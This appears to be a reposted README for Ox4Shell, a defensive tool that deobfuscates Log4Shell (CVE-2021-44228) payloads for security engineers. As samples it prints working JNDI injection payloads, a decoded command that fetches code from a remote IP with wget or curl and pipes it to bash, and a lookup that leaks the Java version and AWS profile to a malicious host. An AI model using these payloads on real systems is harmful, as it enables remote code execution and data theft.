Wednesday, August 24, 2022

Deobfuscate Log4Shell Payloads With Ease




Deobfuscate Log4Shell payloads with ease.

Description

Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools have been created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:[email protected][)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:[email protected]:-z}3z${uY)u:7S2)P4ihH:[email protected]:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

After running Ox4Shell, it transforms into an intuitive and readable form:

${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

This tool also helps to identify and decode base64 commands. For example, consider the following obfuscated payload:

${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

After running Ox4Shell, the tool reveals the attacker's intentions:

${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

We recommend running Ox4Shell with a supplied file (-f) rather than an inline payload (-p), because certain shell environments will escape important characters and therefore yield inaccurate results.

Usage

To run the tool, simply:

~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)


Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io

General:
  -h, --help            Show this help message and exit
  -d, --debug           Enable debug mode (default: False)
  -m MOCK, --mock MOCK  The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
  --max-depth MAX_DEPTH
                        The maximum number of iterations to perform on a given payload (default: 150)
  --decode-base64       Payloads containing base64 will be decoded (default: False)

Targets:
  Choose which target payloads to run Ox4Shell on

  -p PAYLOAD, --payload PAYLOAD
                        A single payload to deobfuscate, make sure to escape '$' signs (default: None)
  -f FILE, --file FILE  A file containing payloads delimited by newline (default: None)

Mock Data

The Log4j library has several unique lookup capabilities, which allow users to look up environment variables, runtime information about the Java process, and so on. This capability grants threat actors the ability to probe for specific information that can uniquely identify the compromised machine they targeted.

Ox4Shell uses the mock.json file to insert common values into certain lookup functions; for example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.

The default set of mock data provided is:

{
    "hostname": "ip-127.0.0.1",
    "env": {
        "aws_profile": "staging",
        "user": "ubuntu",
        "pwd": "/opt/",
        "path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
    },
    "sys": {
        "java.version": "16.0.2",
        "user.name": "ubuntu"
    },
    "java": {
        "version": "Java version 16.0.2",
        "runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
        "vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
        "os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
        "locale": "default locale: en_US, platform encoding: UTF-8",
        "hw": "processors: 1, architecture: amd64-64"
    }
}

For example, we can deobfuscate the following payload using Ox4Shell's mocking capability:

~/Ox4Shell >> python ox4shell.py -p "${jndi:ldap://${sys:java.version}.${env:AWS_PROFILE}.malicious.server/a}"
${jndi:ldap://16.0.2.staging.malicious.server/a}

Authors

License

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.


